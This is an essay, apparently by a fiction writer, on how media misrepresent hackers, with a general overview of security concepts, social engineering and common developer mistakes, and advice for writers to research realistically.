January 24, 2021
Fiction and reality tend to differ in most aspects, be it relationships, secret agents, doctors, you name it. But
hackers are by far one of the most falsely-represented things in media of all forms.
Take this example:
A loud crunch echoed throughout the Dungeon as EtherLord cracked his knuckles. The Dungeon,
his underground hacking lab, was illuminated only by the glowing lights of his three monitors. He opened a
console window, hunched over his keyboard, and began typing with a fury that would have made Beethoven envious.
It was taking too long, so he conjured up another terminal, and another, and another. Code soared across the
screen at a record pace. Then he was in. It had taken him three minutes to crack the power grid's security.
With the next keystroke, the entire east coast would be sitting in the dark. EtherLord smiled. Click.
Pretty dramatic, and pretty exciting. It's also pretty unrealistic. Scenes like this are all over the media.
They're in movies and books, and it's even how the news depicts hackers, but the truth is, hacking is nothing
like that. Unfortunately, as interesting as it sounds (and is), hacking (and coding in general) is pretty
boring to watch.
Let's take a look at another scenario involving a malicious hacker:
Todd, known to his friends on IRC as T-Lulz1337, just finished running his vulnerability
scanner against random-site.com. It had discovered a few potential attack vectors, but it would be a manual
process now to evaluate them and to craft effective attacks. After three hours of playing around and suffering
the atrocious lag caused by all the proxies he was going through to cover his tracks, he had found a promising
persistent cross-site scripting attack vector. Todd spent the next two days crafting a script that would inject
code appearing to be an innocent password-reset form that would blend in with the rest of Random Site. With the
next click, his fake form would become part of the page. In a few weeks, assuming nobody notices it, perhaps he
will have collected enough credentials to make an enticing sales package.
This scenario is more realistic, but not terribly exciting to watch on a big screen, even when you speed it up
with a montage. Scenes like this don't hold up against a teenager hacking into the power grid in a few seconds
and cutting power to the entire block just to prove a point (yet still having an internet connection somehow
afterward), or a man hacking a high-security government system while being pleasured by a stranger, or an agency
fighting off a cyber attack and speeding up the process by having two people operate the same keyboard.
The combination of ignorance and the desire to create an exciting drama lead to the unrealistic depiction of
hackers and IT security in general. So how is it in reality?
The truth is, hacking is just a form of software development combined with quality assurance. It's a process
which involves hours of scanning, searching, reading code, and trial and error in order to find a bug or
vulnerability, followed potentially by hours of code writing or other preparations.
In movies, hackers are cool, beautiful people, sometimes with black leather trench coats and sunglasses. They're
impressive demigods who use a keyboard to mold the world to fit their needs. For whatever reason, the news
thinks all hackers sit in a dark room wearing black hoodies with the hood up like some sort of cyber grim
In reality, hackers are mostly just regular people and aren't necessarily even software developers. Sometimes
they're pretty clever, and sometimes they just know how to use tools which some clever person built. In the
hacking community, a person who has no skill or knowledge of their own and who just operates pre-made tools is
referred to as a "script kiddie". The grand majority of people who call themselves hackers fall into this
Hackers or security professionals often categorize themselves as either black or white hat hackers (sometimes
they invent other-colored hats as well because people don't like dichotomies). The terms aren't really
meaningful or binding in any way but are basically labels to indicate whether a person is considered malicious
(black hat) or not (white hat).
It may at first seem contradictory to consider a non-malicious hacker, but it's a very common and important
profession. Companies employ security engineers or hire security firms to perform penetration tests (tests to
see if the system can be penetrated or hacked) on their applications to ensure that they find and patch
vulnerable code before a malicious user finds it. Some independent hackers find vulnerabilities and report them
to the owners for the sake of improving the quality of the internet or software in general. Many practice what
is known as "full disclosure", which involves publicly publishing their findings in an unrestricted way, forcing
application owners to address it while also allowing potential victims to be as knowledgeable as the attackers.
Simply put, a vulnerability, also sometimes called an attack vector, is a way in which a system can be attacked,
hacked, or exploited in some way. But that's still pretty abstract. What constitutes a vulnerability?
Security can be broken down into three categories: confidentiality, integrity, and availability. These three
qualities are often referred to as the CIA triad. They're the three holy virtues of security, and for each,
there is a negative counterpart or sin.
Confidentiality refers to the protection of information from unauthorized access. A customer's personal data,
for example, such as credit card numbers, home address, email address, etc. should remain private. The failure
of confidentiality is referred to as disclosure. Such failures could be the result of incorrect or missing
access controls, leaked passwords, excessive logging, etc.
Integrity describes the correctness of data. This is particularly important in the case of financial records.
Records of transactions need to be accurate and consistent, and only authorized users should be able to modify
them in a limited way. A failure in integrity is referred to as destruction. A simple example might be if a
random user can modify the price of a product in their shopping cart.
Availability refers to the uptime of a system. An application and its information should be running and
accessible. A failure of availability is referred to as denial. DDoS attacks (distributed denial of service)
are often described in media and these attack availability. A denial of service attack typically aims to
overload a system either through sheer brute force (for example using thousands of machines controlled by
a botnet) or by targeting particularly slow and intensive operations.
In the realm of QA and also in hacking, there are two types of testing: black-box and white-box testing. As the
name indicates, when testing an application whose code and inner workings are a mystery, it's referred to as
black-box testing. This is how most hackers approach a task unless they have insider information, are attempting
to attack open-source software, or were hired to test software.
The methods for identifying possible attack vectors can vary depending on those two testing styles. When you have
access to the code, you can scan it for certain functions or operations which are known to be insecure or which
are often mishandled. When testing a black box, one might begin by attempting to access certain well-known
entities (e.g. adding /wp-admin to the URL to see if its a WordPress blog with an admin panel) or by submitting
forms and modifying URLs and then examining the page source code to see if the input was echoed anywhere. For
desktop applications, an attacker may attempt to decompile the program or run it through tools such as a debugger
or hex editor to examine the program's behavior.
Most researchers or attackers use tools to simplify and speed up the process. These are not magic auto-hack tools
that allow you to hack any system in a matter of seconds. Real-life security tools include vulnerability scanners
that look for common vulnerabilities, port scanners which check for machines that may be accessible to the
public and may be running certain types of software, and brute forcers which can be used to crack passwords
or login forms by trying many combinations.
There have been several major hacks in the past few years which were the result of clever security researchers
who really understood the code they were exploiting. The massive OpenSSL vulnerability, Heartbleed, or the
bash exploit, Shellshock,
and the microprocessor vulnerabilities, Meltdown and Spectre, are good examples with catchy names. Famous
examples like these are actually fairly uncommon.
Fiction would lead you to believe that hackers are computer geniuses performing amazing heist-like feats to either
stick it to "the man" or to destroy the world. The news would have you believe that every time you open your
browser, hackers are trying to enter your home to steal your identity. Lawmakers seem to believe that cookies
are evil digital pastries that give hackers a way to infiltrate your machine. None of this is really true. The
truth is, most major breaches are the result of social engineering and human error. The most vulnerable part of
every system is the human.
Social engineering is the process of exploiting a system through human interaction, particularly using
psychological manipulation to trick users into making security mistakes or disclosing sensitive information.
Phishing is probably the most common example, in which attackers send either random emails or messages claiming
to be something they're not, often with misleading links to fake websites, or targeted messages (spear phishing)
that capitalize on information already known about you. Trickery and exploiting laziness and trust is how the
majority of major breaches occur.
I once witnessed someone take full control of a popular website by simply calling the hosting company and saying
that he forgot his password. The company, being not entirely incompetent, requested proof of identification, so
the hacker created a fake ID card (just the image of one, not even an actual card), and the hosting service
accepted it without further validation or verification. For an entire week, the site belonged to him and the
real owners were blocked.
It's incredible how readily people will share information with someone who simply asks and acts like they belong.
This is how Seven Sinclair, the protagonist of my novel, A Fatal Exception,
typically obtains information to help him solve cases. This also includes physical access to things. Most
offices have locks, but if you saw someone with her hands full heading for the door, would you let it close on
her? Once you have physical access to an internal network or computers, it's easy to wreak havoc.
One of the biggest mistakes developers make is to leak passwords, API keys, and other critical data like user
email addresses or other personally identifiable information. Hard-coded API keys (basically internal passwords)
are sadly very common, and anyone who obtains a copy of the code (or finds unrestricted records in GitHub,
for example), has access to internal systems. Overly verbose logging may be useful for debugging (though if
there's too much information, it's of questionable use), but it's also pretty useful for intruders. All it
would take is for one corporate laptop to be stolen with poorly-secured VPN access, and an attacker would have
access to a plethora of corporate and customer data.
Insecurely stored passwords (e.g. as plaintext) make it possible for all the massive breaches you constantly hear
about to happen. Enormous lists of millions of username and passwords are exported and publicized, and this,
combined with the fact that most people reuse their passwords, make identity theft easy. Identities are stolen,
not through the technical prowess of hackers, but rather through the technical incompetence of developers and
As enticing as it is to make hackers out as digital magicians, writers need to remember that they're just people.
While it's okay to use creative license to make some dramatic exaggerations, don't get carried away, and do your
research. It's unrealistic and disheartening to expect and attempt to become a security expert yourself, but
there are people who would be happy to answer questions. Search for popular hacking communities online and ask
for advice in their forums. Join any of the numerous hacking and security communities on Reddit and ask for tips
or a reality check. Post a question on StackOverflow.
And please, avoid scare tactics. While it's true that more and more things are connected to the web as the years
go by, and science fiction helps us to keep a healthy concern for the dangers of new technology, exaggerated and
unrealistic portrayals do more harm than good.